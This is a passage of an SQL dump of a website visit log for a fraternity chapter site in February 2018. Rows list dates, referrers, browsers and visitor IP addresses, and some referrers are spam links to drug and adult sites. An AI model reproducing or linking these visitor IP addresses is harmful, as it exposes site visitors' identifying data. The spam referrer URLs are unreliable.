phiblgz.org','Unknown','Unknown','Unknown','','173.252.98.81','000',1,0),(25136,'2018-02-25','http://www.zphibmaryland.org/chapters/','Chrome','Windows','64.0.3282.167','','98.117.57.183','000',27,0),(25137,'2018-02-25','https://www.google.com/','Safari','iPhone','11.0','','108.51.77.102','000',3,0),(25138,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.50','000',1,0),(25139,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.228.123','000',2,0),(25140,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.41','000',1,0),(25141,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.229','000',2,0),(25142,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.148','000',1,0),(25143,'2018-02-25','http://zphiblgz.org/scholarship/','Chrome','Macintosh','64.0.3282.167','','71.179.100.71','000',2,0),(25144,'2018-02-25','https://zphiblgz.org','Chrome','Windows','41.0.2227.0','','195.22.127.139','000',1,0),(25145,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.69','000',1,0),(25146,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.121','000',1,0),(25147,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.122','000',1,0),(25148,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.197','000',2,0),(25149,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.114','000',1,0),(25150,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.27','000',1,0),(25151,'2018-02-25','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',1,0),(25152,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.56','000',1,0),(25153,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.29','000',2,0),(25154,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.61','000',1,0),(25155,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.169','000',1,0),(25156,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.204','000',1,0),(25157,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.192','000',3,0),(25158,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.113','000',1,0),(25159,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.214','000',1,0),(25160,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.234','000',1,0),(25161,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.60','000',1,0),(25162,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.78','000',1,0),(25163,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.25','000',1,0),(25164,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.5','000',1,0),(25165,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.86','000',1,0),(25166,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.215','000',1,0),(25167,'2018-02-26','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.59','000',2,0),(25168,'2018-02-26','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.11','000',1,0),(25169,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.17','000',1,0),(25170,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.126','000',4,0),(25171,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.19','000',5,0),(25172,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.72','000',1,0),(25173,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.116','000',2,0),(25174,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.37','000',2,0),(25175,'2018-02-26','https://zphiblgz.org','Firefox','Windows','40.1','','120.29.65.99','000',2,0),(25176,'2018-02-26','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(25177,'2018-02-26','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.30','000',1,0),(25178,'2018-02-26','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','65.99.237.151','000',1,0),(25179,'2018-02-26','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.114','000',1,0),(25180,'2018-02-26','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.27','000',1,0),(25181,'2018-02-26','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',2,0),(25182,'2018-02-26','https://zphiblgz.org/scholarship/','Chrome','Macintosh','64.0.3282.167','','50.225.39.70','000',3,0),(25183,'2018-02-26','https://zphiblgz.org','Safari','iPhone','11.0','','50.225.39.86','000',5,0),(25184,'2018-02-26','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.22','000',1,0),(25185,'2018-02-26','https://zphiblgz.org','Firefox','Windows','40.1','','110.227.141.81','000',2,0),(25186,'2018-02-26','https://zphiblgz.org','MSIE','Windows','11.0','','216.149.208.4','000',2,0),(25187,'2018-02-26','https://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.162','000',2,0),(25188,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.220','000',4,0),(25189,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.142','000',2,0),(25190,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.2','000',1,0),(25191,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.138','000',1,0),(25192,'2018-02-26','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','192.161.163.167','000',1,0),(25193,'2018-02-26','http://www.google.com/','Chrome','Android','64.0.3282.137','','172.58.184.38','000',2,0),(25194,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.213','000',3,0),(25195,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.103','000',1,0),(25196,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.15','000',2,0),(25197,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.212','000',5,0),(25198,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.52','000',1,0),(25199,'2018-02-26','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.47.62.171','000',2,0),(25200,'2018-02-26','http://zphiblgz.org/','Firefox','Windows','7.0.1','','178.17.170.13','000',1,0),(25201,'2018-02-26','http://transit.in.ua/','MSIE','Windows','4.01','','46.118.116.121','000',1,0),(25202,'2018-02-26','https://zphiblgz.org','Chrome','iPhone','64.0.3282.112','','108.56.212.185','000',1,0),(25203,'2018-02-26','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiH1oSz8sPZAhURneAKHbsoBjIQFggmMAA&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','50.225.39.78','000',4,0),(25204,'2018-02-26','https://search.yahoo.com','Firefox','Windows','47.0','','50.225.39.81','000',8,0),(25205,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.119','000',1,0),(25206,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.118','000',1,0),(25207,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.114','000',2,0),(25208,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.77','000',1,0),(25209,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.48','000',1,0),(25210,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.21','000',1,0),(25211,'2018-02-26','https://zphiblgz.org','Firefox','Windows','54.0','','50.225.39.92','000',5,0),(25212,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','133.130.115.217','000',2,0),(25213,'2018-02-26','https://zphiblgz.org','Chrome','Windows','64.0.3282.167','','50.225.39.75','000',2,0),(25214,'2018-02-26','https://pills24h.com/buy-levitra-online-without-prescription/','Unknown','Unknown','Unknown','','178.137.162.218','000',3,0),(25215,'2018-02-26','http://doxyporno.com/','Unknown','Unknown','Unknown','','46.118.116.121','000',2,0),(25216,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.193','000',2,0),(25217,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.221','000',2,0),(25218,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.70','000',1,0),(25219,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.85','000',1,0),(25220,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.70','000',3,0),(25221,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.186','000',2,0),(25222,'2018-02-26','https://zphiblgz.org','Firefox','Windows','40.1','','173.209.57.11','000',2,0),(25223,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.116','000',3,0),(25224,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.84','000',2,0),(25225,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.225','000',2,0),(25226,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.218','000',1,0),(25227,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.139','000',3,0),(25228,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.176','000',1,0),(25229,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.187','000',2,0),(25230,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.213','000',1,0),(25231,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.141','000',1,0),(25232,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.141','000',1,0),(25233,'2018-02-26','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.30','000',1,0),(25234,'2018-02-26','https://www.google.com/','Firefox','Windows','58.0','','71.179.27.66','000',3,0),(25235,'2018-02-26','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.87.207','000',1,0),(25236,'2018-02-26','https://www.google.com/','Chrome','Windows','63.0.3239.132','','167.102.191.10','000',3,0),(25237,'2018-02-26','https://www.google.com/','Chrome','Android','64.0.3282.137','','73.250.78.254','000',2,0),(25238,'2018-02-26','https://www.google.com/','Chrome','Windows','63.0.3239.132','','50.225.39.34','000',4,0),(25239,'2018-02-26','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','23.91.71.214','000',1,0),(25240,'2018-02-26','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.44','000',1,0),(25241,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.23','000',1,0),(25242,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.119','000',5,0),(25243,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.208','000',2,0),(25244,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.211','000',2,0),(25245,'2018-02-26','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.32','000',1,0),(25246,'2018-02-26','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',2,0),(25247,'2018-02-26','https://happysong.ru/','Opera','Windows','8.50','','178.159.37.55','000',3,0),(25248,'2018-02-26','https://www.google.com/','Chrome','Android','64.0.3282.137','','174.205.25.156','000',2,0),(25249,'2018-02-26','https://www.google.com/','Safari','iPhone','11.0','','50.225.39.74','000',4,0),(25250,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.187','000',1,0),(25251,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.169','000',1,0),(25252,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.173','000',2,0),(25253,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.162','000',2,0),(25254,'2018-02-26','https://www.google.com/','Chrome','Windows','64.0.3282.167','','167.102.245.34','000',8,0),(25255,'2018-02-26','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',2,0),(25256,'2018-02-26','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.32','000',1,0),(25257,'2018-02-26','https://zphiblgz.org/','Chrome','Macintosh','62.0.3202.94','','201.81.177.156','000',2,0),(25258,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.122','000',1,0),(25259,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.18','000',2,0),(25260,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.226','000',4,0),(25261,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.193','000',1,0),(25262,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.114','000',1,0),(25263,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.102','000',3,0),(25264,'2018-02-26','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','192.198.80.227','000',1,0),(25265,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.81','000',2,0),(25266,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.29','000',1,0),(25267,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.219','000',1,0),(25268,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.204','000',1,0),(25269,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.177','000',1,0),(25270,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.161','000',1,0),(25271,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.201','000',1,0),(25272,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.128','000',2,0),(25273,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.180','000',2,0),(25274,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.8','000',1,0),(25275,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.137','000',1,0),(25276,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.181','000',1,0),(25277,'2018-02-26','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.32','000',1,0),(25278,'2018-02-26','https://zphiblgz.org','Firefox','Windows','7.0.1','','176.126.252.12','000',1,0),(25279,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.205','000',1,0),(25280,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.118','000',1,0),(25281,'2018-02-26','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(25282,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.205','000',2,0),(25283,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.112','000',2,0),(25284,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.87','000',3,0),(25285,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.88','000',1,0),(25286,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.118','000',1,0),(25287,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.23','000',1,0),(25288,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.245','000',1,0),(25289,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.114','000',1,0),(25290,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.214','000',1,0),(25291,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.183','000',2,0),(25292,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.65','000',1,0),(25293,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.45','000',2,0),(25294,'2018-02-26','https://zphiblgz.org','Firefox','Linux','48.0','','34.229.107.237','000',3,0),(25295,'2018-02-26','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.16','000',1,0),(25296,'2018-02-26','https://zphiblgz.org','Firefox','Windows','40.1','','92.238.107.14','000',2,0),(25297,'2018-02-26','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1709.V4qq_P5J4LbnXwmO0XtTFo2qD7UWDftR4TEpuztJjXVOFyRd2nmtcsbAOKIBn32R.c9142ff43117d93f086e54429c2063019c5d1d5b&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGftRg9cP1erjBfVTUcXDXk&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29VM0RoOU1PZW9KU2JSOFJuSlFRT0QyYlY1TnBjejBpU2FqS1hJQU1hZTBOOWhJTVFQOWJqMVJGR1pDMzJSZ2pZUQ&b64e=2&sign=4a84b7688c4cf8beb0ab67d8d574eebf&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96Fe-L5aQtSeWmGy0K3wn6Mec2_SyVyIvu4NMccqzHzpAYgfBq0Vglo2KmgBz8vgf79MZkhD1GewoFWebRU9k6LzAFoNirHqJZnoWwJWs-HAhu9HzIL2Yo2iZufa1C7WD8a&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXma_RTIh0ntOspuG4UvGCfd67YjgyxjQ8k_omr1LuIuVnemoDQ_WOlXrro3wqkOzEFh5F9Oj_8RQ&l10n=ru&cts=1519676980725&mc=1.61888419808','Firefox','Windows','50.0','','188.32.5.224','000',2,0),(25298,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.249','000',2,0),(25299,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.34','000',2,0),(25300,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.117','000',3,0),(25301,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.130','000',1,0),(25302,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.229','000',1,0),(25303,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.125','000',1,0),(25304,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.198','000',1,0),(25305,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.114','000',2,0),(25306,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.58','000',1,0),(25307,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.212','000',3,0),(25308,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.118','000',2,0),(25309,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.209','000',1,0),(25310,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.50','000',2,0),(25311,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.219','000',1,0),(25312,'2018-02-26','https://zphiblgz.org','Firefox','Linux','42.0','','185.198.167.30','000',2,0),(25313,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.165','000',1,0),(25314,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.169','000',3,0),(25315,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.145','000',1,0),(25316,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.104','000',1,0),(25317,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.90','000',1,0),(25318,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.131','000',2,0),(25319,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.211','000',1,0),(25320,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.186','000',2,0),(25321,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.221','000',3,0),(25322,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.115','000',3,0),(25323,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.85','000',1,0),(25324,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.206','000',1,0),(25325,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.84','000',1,0),(25326,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.193','000',4,0),(25327,'2018-02-26','http://raschtextil.com.ua/','MSIE','Windows','6.0','','46.118.116.121','000',3,0),(25328,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.55','000',2,0),(25329,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.196','000',1,0),(25330,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.213','000',1,0),(25331,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.112','000',2,0),(25332,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.38','000',2,0),(25333,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.122','000',2,0),(25334,'2018-02-26','https://www.google.com/','Chrome','Windows','64.0.3282.168','','69.143.214.79','000',5,0),(25335,'2018-02-26','https://zphiblgz.org','Firefox','Windows','7.0.1','','178.175.135.100','000',1,0),(25336,'2018-02-26','https://www.google.com/','Firefox','Windows','58.0','','76.80.85.162','000',9,0),(25337,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.135','000',4,0),(25338,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.150','000',1,0),(25339,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.193','000',2,0),(25340,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.181','000',1,0),(25341,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.91','000',2,0),(25342,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.192','000',2,0),(25343,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.67','000',1,0),(25344,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.84','000',1,0),(25345,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.114','000',1,0),(25346,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.227','000',1,0),(25347,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.28','000',1,0),(25348,'2018-02-26','https://www.google.com/','Safari','Macintosh','11.0.3','','96.234.210.118','000',8,0),(25349,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.187','000',5,0),(25350,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.232','000',1,0),(25351,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.206','000',3,0),(25352,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.205','000',1,0),(25353,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.198','000',1,0),(25354,'2018-02-26','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.36.27.7','000',2,0),(25355,'2018-02-26','https://zphiblgz.org','Firefox','Windows','40.1','','85.96.155.215','000',2,0),(25356,'2018-02-26','http://zphiblgz.org/','Firefox','Windows','7.0.1','','89.234.157.254','000',2,0),(25357,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.155','000',1,0),(25358,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.243','000',1,0),(25359,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.229','000',2,0),(25360,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.242','000',1,0),(25361,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.68','000',1,0),(25362,'2018-02-26','https://zphiblgz.org','Firefox','Windows','40.1','','189.6.26.32','000',2,0),(25363,'2018-02-26','https://zphiblgz.org','Firefox','Windows','7.0.1','','195.123.212.34','000',1,0),(25364,'2018-02-26','https://zphiblgz.org','Firefox','Windows','7.0.1','','23.129.64.104','000',2,0),(25365,'2018-02-26','http://elementspluss.ru/','Opera','Windows','9.0','','178.137.16.45','000',3,0),(25366,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.87','000',2,0),(25367,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.23','000',1,0),(25368,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.223','000',1,0),(25369,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.113','000',1,0),(25370,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.188','000',1,0),(25371,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.29','000',1,0),(25372,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.65','000',1,0),(25373,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.71','000',1,0),(25374,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.177','000',2,0),(25375,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.212','000',1,0),(25376,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.153','000',1,0),(25377,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.186','000',1,0),(25378,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.42','000',1,0),(25379,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.46','000',1,0),(25380,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.134','000',1,0),(25381,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.21','000',1,0),(25382,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.215','000',1,0),(25383,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.215','000',3,0),(25384,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.25','000',2,0),(25385,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.194','000',1,0),(25386,'2018-02-26','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','68.134.25.149','000',9,0),(25387,'2018-02-26','https://zphiblgz.org','Chrome','Android','64.0.3282.137','','96.244.213.109','000',4,0),(25388,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.20','000',4,0),(25389,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.85','000',1,0),(25390,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.112','000',1,0),(25391,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.27','000',3,0),(25392,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.199','000',3,0),(25393,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.231','000',1,0),(25394,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.212','000',1,0),(25395,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.89','000',1,0),(25396,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.19','000',2,0),(25397,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.120','000',1,0),(25398,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.82','000',2,0),(25399,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.199','000',2,0),(25400,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.6','000',3,0),(25401,'2018-02-26','https://zphiblgz.org','Unknown','Unknown','Unkno